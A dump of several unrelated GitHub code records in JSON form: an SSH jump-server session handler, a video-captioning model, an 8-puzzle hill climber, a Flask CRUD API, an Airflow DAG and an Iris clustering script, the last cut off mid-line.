t.add_server_key(host_key)\n\n server = Server(self.config)\n try:\n t.start_server(server=server)\n except paramiko.SSHException:\n logger.error(\"*** SSH negotiation failed.\")\n logger.error(f\"close the transport now... {t}\")\n return\n\n self.channel = t.accept(timeout=20)\n if self.channel is None:\n logger.error(\"Client never open a new channel, close transport now...\")\n return\n return server\n\n def prepare_shell_env(self, server: Server, t: Transport) -> Tuple[Optional[LBServerMeta], Optional[Popen]]:\n server.shell_event.wait()\n if not server.shell_event.is_set():\n logger.warning(\"Client never asked for a shell, I am going to end this ssh session now...\")\n send_to_channel(\n self.channel,\n \"*** Client never asked for a shell. Server will end session...\",\n )\n return None, None\n\n logger.info(f\"transport peer name: {t.getpeername()}\")\n proxy_subprocess = lb_server = None\n try:\n proxy_subprocess, lb_server = self._create_proxy_process(server.slave_fd)\n except UserCancelException:\n logger.warning(\"user input Ctrl-C or Ctrl-D during the input.\")\n send_to_channel(self.channel, \"Got EOF, closing session...\")\n except ProviderException as e:\n logger.warning(f\"got exceptions from provider: {e}\")\n send_to_channel(self.channel, f\"LobbyBoy got exceptions from provider: {e}\")\n except Exception as e:\n logger.warning(f\"got exceptions: {e}\")\n send_to_channel(self.channel, f\"LobbyBoy got exceptions: {e}\")\n raise\n\n if not (proxy_subprocess and lb_server):\n return None, None\n\n logger.info(f\"proxy subprocess created, pid={proxy_subprocess.pid}\")\n server.proxy_subprocess_pid = proxy_subprocess.pid\n\n send_to_channel(self.channel, int(server.window_width) * \"=\")\n return lb_server, proxy_subprocess\n\n def user_using(self, server: Server, proxy_subprocess: Popen):\n channel_fd = self.channel.fileno()\n master_fd = server.master_fd\n while proxy_subprocess.poll() is None:\n r, *_ = select.select([master_fd, channel_fd], [], [], 0.1)\n if master_fd in r:\n send_to_channel(self.channel, os.read(master_fd, 10240), suffix=b\"\")\n elif channel_fd in r:\n os.write(master_fd, self.channel.recv(10240))\n\n def cleanup(self, t: Transport = None, meta: LBServerMeta = None, check_destroy: bool = False):\n if t and meta:\n self.remove_server_session(t, meta.server_name)\n if check_destroy:\n self.destroy_server_if_needed(meta)\n\n if self.channel:\n self.channel.shutdown(0)\n if t:\n t.close()\n\n def destroy_server_if_needed(self, server: LBServerMeta):\n provider = self.providers[server.provider_name]\n need_destroy, reason = self.killer.need_destroy(provider, server)\n send_to_channel(self.channel, f\"LobbyBoy: This server {reason}.\")\n if not need_destroy:\n return\n\n send_to_channel(self.channel, f\"LobbyBoy: I will destroy {server.server_name}({server.server_host}) now!\")\n self.killer.destroy(provider, server, self.channel)\n send_to_channel(\n self.channel,\n f\"LobbyBoy: Server {server.server_name}({server.server_host}) has been destroyed.\",\n )\n\n @staticmethod\n def remove_server_session(transport: Transport, server_name: str):\n peer_name = transport.getpeername()\n with active_session_lock:\n sessions = active_session.get(server_name)\n if sessions:\n active_session[server_name] = list(filter(lambda x: x.getpeername() != peer_name, sessions))\n\n def run(self):\n logger.info(\n f\"start new thread \"\n f\"handle {self.socket_client}, \"\n f\"address: {self.client_address}, \"\n f\"my thread id={threading.get_ident()}\"\n )\n t = Transport(self.socket_client, gss_kex=DoGSSAPIKeyExchange)\n try:\n t.set_gss_host(socket.getfqdn())\n server = self.prepare_server(t)\n if not (server and self.channel):\n self.cleanup(t)\n return\n\n send_to_channel(self.channel, f\"Welcome to LobbyBoy {__version__}!\")\n lb_server, proxy_subprocess = self.prepare_shell_env(server, t)\n if not (proxy_subprocess and lb_server):\n logger.error(\"failed to create proxy subprocess or lb_server\")\n self.cleanup(t, meta=lb_server)\n return\n\n self.user_using(server, proxy_subprocess)\n send_to_channel(\n self.channel,\n f\"LobbyBoy: SSH to remote server {lb_server.server_name} closed.\",\n )\n self.cleanup(t, meta=lb_server, check_destroy=True)\n except Exception: # noqa\n logger.critical(\"*** Socket thread error.\", exc_info=True)\n self.cleanup(t)\n","repo_name":"lobbyboy-ssh/lobbyboy","sub_path":"lobbyboy/socket_handle.py","file_name":"socket_handle.py","file_ext":"py","file_size_in_byte":10661,"program_lang":"python","lang":"en","doc_type":"code","stars":235,"dataset":"github-code","pt":"72"} +{"seq_id":"27956074300","text":"import torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torch.utils.data import Dataset,DataLoader\nfrom torch import optim\nimport os\nimport numpy as np\nimport json\nimport random\nimport sys\n\ndata_dir = sys.argv[1]\n\nVOCAB_SIZE = 3004 \nDATA_DIR = os.path.join(data_dir,'training_data/feat')\nTEST_DIR = os.path.join(data_dir,'testing_data/feat')\nSAVE_DIR = './save'\nLABEL_PATH = os.path.join(data_dir,'training_label.json')\nID_PATH = os.path.join(data_dir,'testing_id.txt')\nPAD_TOKEN = 0\nBOS_TOKEN = 1\nEOS_TOKEN = 2\nUNK_TOKEN = 3\nhidden_size = 256 \npostfix = 'clip25_lr-3_3000_ss6_integrate'\n\nclass Vocab:\n\tdef __init__(self,label_path):\n\t\tprint(\"Building Vocab\")\n\t\twith open(label_path,'r') as f:\n\t\t\tself.label = json.load(f)\n\t\tself.word2index = {'':0,'':1, '':2, '':3}\n\t\tself.index2word = {0:'',1:'',2:'',3:''}\n\t\tself.word2count = {'':1,'':1,'':1,'':1}\n\t\tself.num_words = 4 \n\t\tself.build()\n\tdef build(self):\n\t\tfor l in self.label:\n\t\t\tfor line in l[\"caption\"]:\n\t\t\t\tfor ch in '.!()':\n\t\t\t\t\tif ch in line:\n\t\t\t\t\t\tline = line.replace(ch,'')\n\t\t\t\tfor w in line.strip().split():\n\t\t\t\t\tif w not in self.word2count.keys():\n\t\t\t\t\t\tself.word2count[w] = 1\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.word2count[w] += 1\n\t\tsorted_word = [w for (w,c) in sorted(self.word2count.items(), key = lambda x: x[1], reverse = True)]\n\t\tfor w in sorted_word[:3000]:\n\t\t\tself.word2index[w] = self.num_words\n\t\t\tself.index2word[self.num_words] = w\n\t\t\tself.num_words += 1\n\ndef cap2index(caption,V):\n\tfor ch in '.!()':\n\t\tif ch in caption:\n\t\t\tcaption = caption.replace(ch, '')\n\tcaption_index = [PAD_TOKEN for _ in range(50)]\n\tfor i,word in enumerate(caption.split()):\n\t\tif word in V.word2index.keys():\n\t\t\tcaption_index[i] = V.word2index[word]\n\t\telse:\n\t\t\tcaption_index[i] = UNK_TOKEN\n\tcaption_index[len(caption.split())] = EOS_TOKEN\n\treturn caption_index\n\nclass TA_Dataset(Dataset):\n\tdef __init__(self,data_dir,label_path):\n\t\tprint(\"Preparing dataset\")\n\t\tself.data_dir = data_dir\n\t\twith open(label_path,'r') as f:\n\t\t\tself.label = json.load(f)\n\n\tdef __len__(self):\n\t\treturn len(self.label)\n\t\n\tdef __getitem__(self,index):\n\t\tavi_id = self.label[index][\"id\"]+'.npy'\n\t\tdata = torch.from_numpy(np.load(os.path.join(self.data_dir,avi_id))).float().cuda()\n\t\tcaption_index = torch.LongTensor(cap2index(random.choice(self.label[index][\"caption\"]),V)).cuda()\n\t\treturn data,caption_index\n\nclass Testset(Dataset):\n\tdef __init__(self,data_dir,id_path):\n\t\tprint(\"Preparing dataset\")\n\t\tself.data_dir = data_dir\n\t\tself.label = []\n\t\twith open(id_path,'r') as f:\n for line in f:\n self.label.append(line.strip())\n\tdef __len__(self):\n\t\treturn len(self.label)\n\t\n\tdef __getitem__(self,index):\n\t\tavi_id = self.label[index]+'.npy'\n\t\tdata = np.load(os.path.join(self.data_dir,avi_id))\n\t\treturn data,self.label[index]\n\n\nclass Encoder(nn.Module):\n\tdef __init__(self,input_size,hidden_size,layer=1):\n\t\tsuper(Encoder,self).__init__()\n\t\tself.input_size = input_size\n\t\tself.hidden_size = hidden_size\n\t\tself.layer = layer\n\t\tself.lstm = nn.LSTM(input_size,hidden_size,layer,batch_first = True)\n\t\n\tdef forward(self,data,hidden):\n\t\tfor i in range(self.layer):\n\t\t\toutput,hidden = self.lstm(data,hidden)\n\t\treturn output,hidden\n\n\tdef init_hidden(self,batch_size):\n\t\treturn Variable(torch.zeros(1,batch_size,self.hidden_size).cuda()),Variable(torch.zeros(1,batch_size,self.hidden_size).cuda())\n\nclass Decoder(nn.Module):\n\tdef __init__(self,input_size,hidden_size,layer=1):\n\t\tsuper(Decoder,self).__init__()\n\t\tself.input_size = input_size\n\t\tself.hidden_size = hidden_size\n\t\tself.layer = layer\n\t\tself.lstm = nn.LSTM(input_size,hidden_size,layer,batch_first = True)\n\t\tself.hidden2out = nn.Linear(hidden_size,VOCAB_SIZE)\n\t\tself.softmax = nn.LogSoftmax()\n\t\tself.embedding = nn.Embedding(VOCAB_SIZE,hidden_size)\n\n\tdef forward(self,data,hidden):\n\t\tfor i in range(self.layer):\n\t\t\toutput,hidden = self.lstm(data,hidden)\n\t\t\tresult = self.softmax(self.hidden2out(output).view(-1,VOCAB_SIZE))\n\t\t\tembed = self.embedding(torch.max(result,1)[1]).view(-1,1,hidden_size)\n\t\treturn result, embed, hidden\n\n\tdef init_hidden(self,batch_size):\n\t\treturn Variable(torch.zeros(1,batch_size,self.hidden_size).cuda()),Variable(torch.zeros(1,batch_size,self.hidden_size).cuda())\n\n\n### Training Stage ###\n\nV = Vocab(LABEL_PATH)\nITER = 2\nDS = TA_Dataset(DATA_DIR,LABEL_PATH)\nDL = DataLoader(DS,batch_size = 16)\nprint(\"Finish building dataloader\")\nE = Encoder(4096, hidden_size, 1).cuda()\nD = Decoder(2*hidden_size, hidden_size, 1).cuda()\ncriterion = nn.NLLLoss().cuda()\ne_optim = optim.Adam(E.parameters(), lr=1e-3)\nd_optim = optim.Adam(D.parameters(), lr=1e-3)\nSS_RATIO = 0.6\n\ndirectory = os.path.join(SAVE_DIR, 'S2VT_EnDe', '{}-{}'.format(hidden_size,postfix))\nif not os.path.exists(directory):\n os.makedirs(directory)\n\nSAVE = 1\t \nfor epoch in range(1,ITER):\n\ttotal_loss = 0\n\tfor data,caption_index in DL:\n\t\te_optim.zero_grad()\n\t\td_optim.zero_grad()\n\t\n\t\tfeat = Variable(data.view(data.size()[0], 80, -1))\n\t\ttarget = Variable(caption_index)\n\t\t## stage 1 ##\n\n\t\tdecoder_padding = Variable(torch.zeros(data.size()[0],80,hidden_size).cuda())\n\t\tencoder_hidden = E.init_hidden(data.size()[0])\n\t\tdecoder_hidden = D.init_hidden(data.size()[0])\n\t\t\n\t\tencoder_output1, encoder_hidden = E(feat, encoder_hidden)\n\t\tdecoder_result, decoder_output1, decoder_hidden = D(torch.cat((decoder_padding,encoder_output1),2),decoder_hidden)\n\t\n\t\tembed = Variable(torch.zeros(data.size()[0],1,hidden_size).cuda())\n\t\t## stage 2 ##\n\t\tloss = 0\n\t\tencoder_padding = Variable(torch.zeros(data.size()[0],1,4096).cuda())\n\t\tfor i in range(caption_index.size()[1]):\n\t\t\tencoder_output2, encoder_hidden = E(encoder_padding,encoder_hidden)\n\t\t\tdecoder_result2, embed, decoder_hidden = D(torch.cat((embed,encoder_output2),2),decoder_hidden)\n\t\t\tif random.uniform(0,1) < SS_RATIO:\n\t\t\t\tembed = D.embedding(target[:,i]).view(-1,1,hidden_size)\n\t\t\tloss += criterion(decoder_result2,target[:,i])\t\n\n\t\ttotal_loss += loss.data[0]\n\t\tloss.backward()\n\t\n\t\ttorch.nn.utils.clip_grad_norm(E.parameters(), 0.25)\n\t\ttorch.nn.utils.clip_grad_norm(D.parameters(), 0.25)\n\t\n\t\te_optim.step()\n\t\td_optim.step()\n\tprint('Epoch {} Loss: {}'.format(epoch, total_loss/len(DS)))\n\tif epoch%SAVE == 0:\n\t\ttorch.save({'encoder': E.state_dict(),'decoder': D.state_dict(), 'loss': total_loss/len(DS)}, os.path.join(directory, '{}.tar'.format(epoch)))\nprint(\"Finish training\")\n### Testing Stage ###\nBATCH_SIZE = 1\nTS = Testset(TEST_DIR,ID_PATH)\nCHECK_PATH = './save/S2VT_EnDe/{}-{}/{}.tar'.format(hidden_size,postfix,1)\ncheckpoint = torch.load(CHECK_PATH)\nE = Encoder(4096,hidden_size)\nE.load_state_dict(checkpoint['encoder'])\nD = Decoder(2*hidden_size,hidden_size)\nD.load_state_dict(checkpoint['decoder'])\nE = E.cuda()\nD = D.cuda()\nE.eval()\nD.eval()\nMAX_LENGTH = 50\n\ndef output_sen(index_list,V):\n\toutput = \"\"\n\tfor i in index_list:\n\t\tif i == EOS_TOKEN:\n\t\t\t#output += \" .\"\n\t\t\tbreak\n\t\telif i == BOS_TOKEN or i == PAD_TOKEN:\n\t\t\tcontinue\n\t\telse:\n\t\t\toutput += V.index2word[i]+\" \"\n\treturn output\t\n\nwith open(sys.argv[2],'w') as f:\n\tfor data in TS:\n\t\tcaption_id = data[1]\n\t\tdata = data[0]\n\t\tfeat = Variable(torch.from_numpy(data).view(1,-1,4096).float()).cuda()\n\t\tencoder_hidden = E.init_hidden(1)\n\t\tdecoder_hidden = D.init_hidden(1)\n\t\tdecoder_padding = Variable(torch.zeros(1,feat.size()[1],hidden_size).cuda())\n\t\tencoder_output1, encoder_hidden = E(feat,encoder_hidden)\n\t\tdecoder_result1, decoder_output1, decoder_hidden = D(torch.cat((decoder_padding,encoder_output1),2),decoder_hidden)\n\t\t\n\t\tembed = torch.zeros(1,1,hidden_size).cuda()\n\t\tembed = Variable(embed)\n\t\t\t\n\t\tencoder_padding = Variable(torch.zeros(1,1,4096).cuda())\n\t\tresult = []\n\t\tfor i in range(MAX_LENGTH):\n\t\t\tencoder_output2, encoder_hidden = E(encoder_padding, encoder_hidden)\n\t\t\tdecoder_result2, embed, decoder_hidden = D(torch.cat((embed,encoder_output2),2),decoder_hidden)\n\t\t\tresult.append(torch.max(decoder_result2,1)[1].data[0])\n\t\t'''\n\t\t### Beam Search ###\n\t\tbeam_size = 3\n\t\tmax_length = 20\n\t\tdef check_all_done(seqs):\n\t\t\tfor seq in seqs:\n\t\t\t\tif not seq:\n\t\t\t\t\treturn False\n\t\t\treturn True\n\n\t\tdef decode_step(seq):\n\t\t\te_p = encoder_padding\n\t\t\te_h = encoder_hidden\n\t\t\tem = embed\n\t\t\td_h = decoder_hidden\n\t\t\tif len(seq) == 1:\n\t\t\t\tencoder_output2,e_h = E(e_p, e_h)\n\t\t\t\td_r2, em, d_h = D(torch.cat((em,encoder_output2),2),d_h)\n\t\t\telse:\n\t\t\t\tfor i in range(1,len(seq)):\n\t\t\t\t\tindex = Variable(torch.LongTensor(seq[i][0]).cuda())\n\t\t\t\t\tencoder_output2,e_h = E(e_p, e_h)\n\t\t\t\t\td_r2, em, d_h = D(torch.cat((em,encoder_output2),2),d_h)\n\t\t\t\t\tem = D.embedding(index).view(-1,1,hidden_size)\n\t\t\tresult_prob = d_r2.data[0]\n\t\t\tprob = []\n\t\t\tprob = [(idx,p) for idx,p in enumerate(result_prob)]\n\t\t\tprob = sorted(prob,key = lambda x: x[1], reverse = True)\n\t\t\treturn prob\n\n\t\tdef beam_search_step(top_seqs,k):\n\t\t\tall_seqs = []\n\t\t\tfor seq in top_seqs:\n\t\t\t\tseq_score = sum([s for _,s in seq])\n\t\t\t\tif seq[-1][0] == EOS_TOKEN:\n\t\t\t\t\tall_seqs.append((seq,seq_score,True))\n\t\t\t\t\tcontinue\n\t\t\t\tcurrent_step = decode_step(seq)\n\t\t\t\tfor i, word in enumerate(current_step):\n\t\t\t\t\tif i >= k:\n\t\t\t\t\t\tbreak\n\t\t\t\t\tword_index = word[0]\n\t\t\t\t\tword_score = word[1]\n\t\t\t\t\tscore = seq_score + word_score\n\t\t\t\t\trs_seq = seq + [word]\n\t\t\t\t\tdone = (word_index == EOS_TOKEN)\n\t\t\t\t\tall_seqs.append((rs_seq,score,done))\n\t\t\tall_seqs = sorted(all_seqs, key = lambda x: x[1], reverse = True)\n\t\t\ttopk_seqs = [seq for seq,_,_ in all_seqs[:k]]\n\t\t\tcheck = [done for _,_,done in all_seqs[:k]]\n\t\t\tall_done = check_all_done(check)\n\t\t\treturn topk_seqs, all_done\n\n\t\ttop_seqs = [[(BOS_TOKEN,0)]]\n\t\tfor i in range(max_length):\n\t\t\ttop_seqs, all_done = beam_search_step(top_seqs,beam_size)\n\t\t\tif all_done:\n\t\t\t\tbreak\n\t\tprint(top_seqs)\n\t '''\t\n\t\tf.write('{},{}\\n'.format(caption_id,output_sen(result,V)))\n","repo_name":"camel8899/MLDS","sub_path":"hw2/model_integrate.py","file_name":"model_integrate.py","file_ext":"py","file_size_in_byte":9710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16294894887","text":" # -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Aug 28 23:03:11 2021\r\n\r\n@author: abhis\r\n\"\"\"\r\n\r\nfrom tile import Tiles\r\nfrom time import time\r\nimport random\r\n\r\nclass Hill_Climbing:\r\n def __init__(self,initial,goal):\r\n self.initial_state=initial\r\n self.goal_state=goal\r\n \r\n print(\"Start State: \")\r\n print(self.initial_state[0:3])\r\n print(self.initial_state[3:6])\r\n print(self.initial_state[6:9])\r\n \r\n print(\"Goal State: \")\r\n print(self.goal_state[0:3])\r\n print(self.goal_state[3:6])\r\n print(self.goal_state[6:9]) \r\n print()\r\n def solve(self,type_algo,heuristic):\r\n curr_state=Tiles(self.initial_state,None,self.goal_state,0,None,0,heuristic)\r\n goal_found=False\r\n path=[]\r\n path.append(curr_state.move)\r\n while goal_found==False:\r\n successors=curr_state.successors_curr_state() \r\n \r\n if type_algo==\"greedy\":\r\n curr_state=self.greedy(curr_state,successors) \r\n elif type_algo==\"first\":\r\n curr_state=self.first_succ(curr_state,successors) \r\n elif type_algo==\"stochastic\":\r\n curr_state=curr_state=self.stochastic_random_walk(curr_state,successors) \r\n \r\n if curr_state.path_cost\",end=\" \")\r\n print(\"Optimal Path Cost: \",curr_state.path_cost) \r\n print(\"Total No of States checked are: \",Tiles.state_count)\r\n print(\"Total No of States to optimal path: \",curr_state.path_cost+1) \r\n else:\r\n print(\"Goal not found\")\r\n print(\"Total number of states explored before termination are \",Tiles.state_count)\r\n def greedy(self,curr_state,successors):\r\n best_successor=curr_state \r\n \r\n for succ in successors: \r\n if succ.hvalue < curr_state.hvalue:\r\n best_successor=succ \r\n return best_successor\r\n \r\n def first_succ(self,curr_state,successors):\r\n \r\n for succ in successors: \r\n if succ.hvalue < curr_state.hvalue:\r\n return succ \r\n return curr_state\r\n \r\n def stochastic_random_walk(self,curr_state,successors):\r\n good_successors=[]\r\n best_hvalue=curr_state.hvalue\r\n for succ in successors:\r\n if succ.hvalue0:\r\n random_succ = random.choice(good_successors) \r\n return random_succ\r\n else:\r\n return curr_state\r\n \r\ndef main():\r\n with open(\"input.txt\", \"r\") as f: \r\n \t\r\n data=f.read().split(\"\\n\\n\\n\")\r\n inp,goal = data[0],data[1]\r\n initial=[int(y) for x in inp.split(\"\\n\") for y in x.split(\",\")]\r\n goal=[int(y) for x in goal.split(\"\\n\") for y in x.split(\",\")]\r\n \r\n t0=time()\r\n hill=Hill_Climbing(initial,goal)\r\n hill.solve(\"first\",\"h3\")\r\n t1=time()-t0\r\n \r\n print(\"time taken by Hill Climbing is\",t1)\r\nif __name__==\"__main__\":\r\n main()\r\n ","repo_name":"abhi5hekjangid/8-Puzzle-","sub_path":"hillclimbing.py","file_name":"hillclimbing.py","file_ext":"py","file_size_in_byte":3795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16504504885","text":"from flask import Flask, request, jsonify, make_response\r\nfrom flask_sqlalchemy import SQLAlchemy\r\nfrom marshmallow_sqlalchemy import ModelSchema\r\nfrom marshmallow import fields\r\n\r\napp = Flask(__name__)\r\napp.config['SQLALCHEMY_DATABASE_URI']='postgresql://postgres:asad1234@127.0.0.1:5432/postgres'\r\ndb = SQLAlchemy(app)\r\n\r\n\r\n@app.route('/')\r\ndef start():\r\n return \"Welcome to my page\"\r\n\r\nclass Info(db.Model):\r\n __tablename__=\"info\"\r\n id = db.Column(db.Integer, primary_key=True)\r\n name = db.Column(db.String(40))\r\n address = db.Column(db.String(40))\r\n age = db.Column(db.Integer)\r\n phone = db.Column(db.Integer)\r\n\r\n def create(self):\r\n db.session.add(self) \r\n db.session.commit() #adding data to database\r\n return self\r\n \r\n def __init__(self, name, address, age, phone):\r\n self.name = name\r\n self.address = address\r\n self.age = age\r\n self.phone = phone\r\n \r\n def __repr__(self):\r\n return '' % self.id\r\n\r\ndb.create_all() ##to create table\r\n\r\nclass InfoSchema(ModelSchema):\r\n class Meta(ModelSchema.Meta):\r\n model = Info\r\n sqla_session = db.session\r\n id = fields.Number(dump_only=True)\r\n name = fields.String(required=True)\r\n address = fields.String(required=True)\r\n age = fields.Number(required=True)\r\n phone = fields.Number(required=True) \r\n\r\n#DESIGNING ENDPOINTS FOR CRUD\r\n#GET Operation\r\n\r\n@app.route('/Info', methods=['GET'])\r\ndef index():\r\n get_info = Info.query.all() #in form of list \r\n Info_schema = InfoSchema(many=True) #json to object viveversa\r\n info = Info_schema.dump(get_info)\r\n return make_response(jsonify({ \"info\":info}))\r\n\r\n\r\n#POST Operation\r\n\r\n@app.route('/Info', methods = ['POST'])\r\ndef create_info():\r\n data = request.get_json()\r\n Info_schema = InfoSchema()\r\n info = Info_schema.load(data) ##json to object\r\n result = Info_schema.dump(info.create())\r\n return make_response(jsonify({\"info\": result}),200)\r\n\r\n#UPDATE Operation\r\n\r\n@app.route('/Info/', methods = ['PUT'])\r\ndef update_Info_by_id(id):\r\n data = request.get_json()\r\n get_info = Info.query.get(id)\r\n if data.get('name'):\r\n get_info.name = data['name']\r\n if data.get('address'):\r\n get_info.address = data['address']\r\n if data.get('age'):\r\n get_info.age = data['age']\r\n if data.get('phone'):\r\n get_info.phone= data['phone'] \r\n db.session.add(get_info)\r\n db.session.commit()\r\n Info_schema = InfoSchema()\r\n infos = Info_schema.dump(get_info)\r\n return make_response(jsonify({\"info\": infos}))\r\n\r\n#DELETE Operation\r\n\r\n@app.route('/Info/', methods = ['DELETE'])\r\ndef delete_Info_by_id(id):\r\n get_info = Info.query.get(id)\r\n db.session.delete(get_info)\r\n db.session.commit()\r\n return make_response(\"\",204)\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True, port=3000)\r\n","repo_name":"dpka09/FuseMachinesInternship","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26814589024","text":"from datetime import datetime\n\nfrom sql.exts import db\n\n\nclass UserModel(db.Model):\n __tablename__ = \"user\"\n userid = db.Column(db.Integer, primary_key=True, autoincrement=True, comment=\"自增id\")\n username = db.Column(db.String(50), nullable=False, comment=\"用户名\")\n password = db.Column(db.String(256), nullable=False, comment=\"密码\")\n nickname = db.Column(db.String(50), nullable=False, comment=\"用户昵称\")\n sex = db.Column(db.String(20), nullable=False, comment=\"性别\")\n height = db.Column(db.Integer, nullable=False, comment=\"身高\")\n weight = db.Column(db.Integer, nullable=False, comment=\"体重\")\n\n def save_to_db(self):\n db.session.add(self)\n db.session.commit()\n\n @classmethod\n def find_by_username(cls, username):\n return cls.query.filter_by(username=username).first()\n\n @classmethod\n def query_all_user(cls):\n return cls.query.all()\n\n\nclass HistoryModel(db.Model):\n __tablename__ = \"sport_history\"\n num = db.Column(db.Integer, primary_key=True, autoincrement=True, comment=\"自增序号\")\n username = db.Column(db.String(50), nullable=False, comment=\"用户名\")\n sport_name = db.Column(db.String(50), nullable=False, comment=\"运动名称\")\n count = db.Column(db.Integer, nullable=False, comment=\"运动计数\")\n sport_time = db.Column(db.Integer, nullable=False, comment=\"运动时间(秒)\")\n start_time = db.Column(db.DateTime, nullable=False, comment=\"运动开始时间\")\n\n def save_to_db(self):\n db.session.add(self)\n db.session.commit()\n\n @classmethod\n def query_all_by_username(cls, username):\n return cls.query.filter_by(username=username).all()\n\n @classmethod\n def query_select(cls, username, sport_name, start_time):\n if sport_name is not None and start_time is not None:\n return cls.query.filter(cls.username == username, cls.sport_name == sport_name,\n db.cast(cls.start_time, db.DATE) == db.cast(start_time, db.DATE)).all()\n elif start_time is None:\n return cls.query.filter_by(username=username, sport_name=sport_name).all()\n else:\n return cls.query.filter(cls.username == username,\n db.cast(cls.start_time, db.DATE) == db.cast(start_time, db.DATE)).all()\n","repo_name":"Creayhhh/LoopServer","sub_path":"sql/sql_models.py","file_name":"sql_models.py","file_ext":"py","file_size_in_byte":2344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4279910269","text":"from datetime import datetime, timedelta\nfrom airflow import DAG\nfrom airflow.providers.docker.operators.docker import DockerOperator\nfrom airflow.utils.dates import days_ago\nfrom airflow.models import Variable\nfrom docker.types import Mount\nfrom omegaconf import OmegaConf\n\ncfg = OmegaConf.load(Variable.get('CONFIG_FILE_PATH'))\n\ndefault_args = {\n \"owner\": \"airflow\",\n \"depends_on_past\": False,\n \"email\": [\"yaapudyakov@edu.hse.ru\"],\n \"retries\": 1,\n \"retry_delay\": timedelta(minutes=5),\n}\n\nbatch_size = cfg['data']['batch_size']\nraw_data_path = cfg['paths']['raw_data_path']\nraw_target_path = cfg['paths']['raw_target_path']\nsource_data_dir = cfg['paths']['source_data_dir']\ntarget_data_dir = cfg['paths']['target_data_dir']\n\nwith DAG(\n dag_id=\"generate_data_batch\",\n start_date=datetime.today(),\n schedule_interval=\"@daily\",\n) as dag:\n\n generate_data = DockerOperator(\n image=\"generate-data\",\n command=f\"--k {batch_size} --save_data_path {raw_data_path} --save_target_path {raw_target_path} \" + \"--date {{ ds }}\",\n network_mode=\"bridge\",\n task_id=\"generate_data\",\n do_xcom_push=False,\n mount_tmp_dir=False,\n mounts=[Mount(source=source_data_dir, target=target_data_dir, type='bind')]\n )\n","repo_name":"made-mlops-2022/pudyakov_yaroslav_made","sub_path":"hw3/dags/data_generator.py","file_name":"data_generator.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25706351975","text":"import sys, time, os\n\ntop = os.path.abspath(os.path.join(os.path.dirname(sys.argv[0]), '..', '..'))\nos.putenv('SC_NODE_PATH', os.path.join(top, 'src', 'test', 'nodes'))\nsys.path.append(os.path.join(top, 'src', 'python'))\nimport solar_capture as sc\n\n\nargs = sys.argv[1:]\nassert len(args) >= 1\ncores = [int(a) for a in args]\nn_hops = len(cores)\n\nscs = sc.new_session()\n\nc2t = dict([(c, scs.new_thread(attr=dict(affinity_core=c))) \\\n for c in set(cores)])\nthrds = [c2t[c] for c in cores]\n\nthrd = thrds[0]\nsct_sender = thrd.new_node('sct_sender', args=dict(n=1))\npipeline = sct_sender\n\nrepeater = thrd.new_node('sc_repeater')\npipeline = sc.connect(pipeline, repeater)\n\nif n_hops > 1:\n thrd = thrds[1]\nmipg = thrd.new_node('sct_measure_ipg', args=dict(exit=1, iter=10000000))\npipeline = sc.connect(pipeline, mipg)\n\nfor i in range(n_hops - 2):\n touch = thrds[i+2].new_node('sct_touch')\n pipeline = sc.connect(pipeline, touch)\n\nsc.connect(pipeline, repeater, 'recycle')\n\nscs.go()\nwhile True:\n time.sleep(10000)\n","repo_name":"Xilinx-CNS/solarcapture","sub_path":"src/test/internal_loop.py","file_name":"internal_loop.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"16011194035","text":"# uncompyle6 version 3.2.3\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 2.7.5 (default, Jul 13 2018, 13:06:57) \n# [GCC 4.8.5 20150623 (Red Hat 4.8.5-28)]\n# Embedded file name: ./monitor/migrations/0020_database_is_switch_off.py\n# Compiled at: 2018-08-23 19:33:14\n# Size of source mod 2**32: 387 bytes\nfrom django.db import migrations, models\n\nclass Migration(migrations.Migration):\n dependencies = [\n ('monitor', '0019_db_schema')]\n operations = [\n migrations.AddField(model_name='database',\n name='is_switch_off',\n field=models.BooleanField(default=False))]\n# okay decompiling ./restful/hawkeye/monitor/migrations/0020_database_is_switch_off.pyc\n","repo_name":"zsprn123/yunqu","sub_path":"restful/hawkeye/monitor/migrations/0020_database_is_switch_off.py","file_name":"0020_database_is_switch_off.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33136263876","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport sys \nfrom sklearn.cluster import KMeans\n\ndataset = pd.read_csv('data/Iris.csv')\nx = dataset.iloc[:, [1, 2, 5]].values\n\nfor i in range(len(x)):\n if x[i][2] == 'Iris-setosa': x[i][2] = 0\n elif x[i][2] == 'Iris-versicolor': x[i][2] = 1\n elif x[i][2] == 'Iris-virginica': x[i][2] = 2\n\n\nplt.scatter(x[:, 0], x[:, 1], s = 50, c = x[:,2])\nplt.xlabel('SepalLengthCm')\nplt.ylabel('SepalWidthCm')\nplt.legend()\nplt.show()\n\nx = dataset.iloc[:, [1, 2]].values\n\nkmeans = KMeans(n_clusters=3, init='random', n_init=2, max_iter=3, precompute_distances='auto', verbose=0, random_state=None, copy_x=True, n_jobs=None, algorithm='auto')\ny_kmeans = kmeans.fit_predict(x)\n\nplt.scatter(x[y_kmeans == 0, 0], x[y_kmeans == 0, 1], s = 50, c = 'red', label = 'Iris-setosa')\nplt.scatter(x[y_kmeans == 1, 0], x[y_kmeans == 1, 1], s = 50, c = 'blue', label = 'Iris-versicolour')\nplt.scatter(x[y_kmeans == 2, 0], x[y_kmeans == 2, 1],\n s=50, c='green', label='Iris-virginica')\nplt.scatter(kmeans.cluster_centers_[:, 